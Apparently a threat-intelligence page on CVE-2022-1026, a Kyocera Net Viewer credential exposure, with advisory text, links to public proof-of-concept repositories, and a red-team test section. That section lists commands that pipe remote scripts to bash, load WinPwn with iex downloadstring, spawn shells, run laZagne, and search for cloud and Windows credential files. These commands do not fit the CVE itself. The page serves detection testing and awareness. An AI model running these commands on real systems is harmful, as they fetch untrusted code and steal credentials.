CVE-2022-1026
Overview
This vulnerability is an information exposure flaw caused by insufficient access controls in the address book export functionality of Kyocera Multifunction Printer Net Viewer. The affected component improperly protects sensitive user data, including authentication credentials, during export operations. The root cause lies in the lack of adequate authorization checks and encryption safeguards within the address book export feature of the Net Viewer software.
Vulnerability Description
Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function.
Impact
An unauthenticated remote attacker can extract sensitive credentials from the address book export feature, enabling unauthorized access to user accounts and potentially the printer management interface. This exposure facilitates lateral movement within the network and unauthorized data access. The attack requires only network connectivity to the vulnerable Net Viewer service, with no user interaction or privileges needed, as reflected by the CVSS vector AV:N/AC:L/PR:N/UI:N. The compromised credentials could lead to broader compromise of enterprise printing infrastructure and associated data.
Solution
Kyocera advises updating the Net Viewer software to the patched version detailed in their security advisory dated April 4, 2022, available at https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2022-04-04.html. The update addresses the insufficient protection in the address book export function. Organizations should apply this vendor-provided patch promptly. Additional remediation guidance and technical details are provided in the advisory and the Rapid7 analysis linked at https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/. No alternative workarounds are specified.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Kyocera multifunction printers stems from an inadequately secured address book export function within the Net Viewer application. This flaw allows unauthorized access to sensitive user information, including usernames and passwords, which can be extracted through a straightforward exploitation process. The underlying issue is rooted in the lack of proper access controls and encryption mechanisms when exporting address book data. As a result, any individual with network access to the printer can potentially retrieve this sensitive information without the need for authentication, leading to significant security concerns.
Attack vectors for this vulnerability are relatively straightforward, primarily involving network-based exploitation. An attacker could leverage local network access to send crafted requests to the printer's export function, thereby retrieving the address book data. This could be executed by an insider threat or an external attacker who has gained access to the network. Furthermore, the ease of exploitation is exacerbated by the fact that many organizations may not have adequate network segmentation or monitoring in place, allowing for lateral movement within the network. In scenarios where printers are connected to less secure networks, the risk of exploitation increases dramatically, making it crucial for organizations to understand the potential pathways an attacker might take.
The real-world impact of this vulnerability can be profound, particularly for organizations that handle sensitive information. The exposure of usernames and passwords can lead to unauthorized access to critical systems, data breaches, and potential compliance violations, especially in regulated industries such as healthcare and finance. The business risks associated with such breaches include financial losses, reputational damage, and legal ramifications. Organizations may face significant costs related to incident response, remediation, and potential fines from regulatory bodies. Additionally, the loss of customer trust can have long-lasting effects on a business's viability and market position.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to conduct a thorough inventory of all Kyocera multifunction printers in use and verify their firmware versions against known vulnerabilities. Regularly updating the firmware to the latest versions provided by the manufacturer can help close security gaps. Furthermore, organizations should enforce strict access controls and network segmentation to limit exposure to these devices. Implementing robust monitoring solutions can also aid in detecting unusual activities related to printer access and data exports. Additionally, employing encryption for sensitive data, both at rest and in transit, can significantly reduce the risk of data exposure.
In conclusion, the vulnerability present in Kyocera multifunction printers poses a significant threat to organizations that utilize these devices without adequate security measures. The technical details reveal a fundamental flaw in the handling of sensitive information, while the attack vectors highlight the ease with which this vulnerability can be exploited. The potential real-world impacts underscore the importance of proactive security measures, and the recommended detection and mitigation strategies provide a pathway for organizations to protect themselves against such threats. By prioritizing cybersecurity and addressing vulnerabilities promptly, organizations can safeguard their sensitive data and maintain trust with their stakeholders.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2022-1026, with telemetry indicating a sustained increase in attempts to exploit the Kyocera multifunction printer vulnerability. This uptick coincides with the emergence of several new proof-of-concept exploits that enhance ease of exploitation and enable broader scanning capabilities, potentially lowering the barrier for adversaries to conduct reconnaissance and data exfiltration. Although the EPSS score remains high and stable, the proliferation of publicly available, improved exploit tools suggests an expanding attacker interest and operationalization of this vulnerability. For defenders, this development signals an elevated risk environment where opportunistic threat actors may increasingly target vulnerable devices to harvest sensitive credentials, thereby amplifying the potential for lateral movement and further compromise within affected networks. Consequently, the threat level associated with CVE-2022-1026 should be considered heightened, reflecting both the growing exploitation activity and the enhanced accessibility of attack resources.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Kyocera | Net Viewer | All |
cpe:2.3:a:kyocera:net_viewer:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ac3lives/kyocera-cve-2022-1026
An unauthenticated data extraction vulnerability in Kyocera printers, which allows for recovery of cleartext address boo...
|
ac3lives | 23 | 4 | 2023-03-15 | View |
|
D4RKMATT3R/KyoceraCredsDump
Kyocera cred dumper based on CVE-2022-1026
|
D4RKMATT3R | 6 | 0 | 2026-04-22 | View |
|
flamebarke/nmap-printer-nse-scripts
NSE port of CVE-2022-1026 exploit for mass identification and exploitation
|
flamebarke | 2 | 0 | 2023-07-15 | View |
|
h4po0n/kyocera-cve-2022-1026_SOAP1.1
An unauthenticated data extraction vulnerability in Kyocera printers, which allows for recovery of cleartext address boo...
|
h4po0n | 2 | 0 | 2025-12-22 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
r0lh/kygocera
Improved Golang Version of Rapid7 PoC for CVE-2022-1026
|
r0lh | 0 | 0 | 2024-06-13 | View |
Threat Feed
19 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-1026 |
| kyoceradocumentsolutions.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2022-04-04.html |
| rapid7.com |
GitHub CVE
x_refsource_MISC
|
https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/ |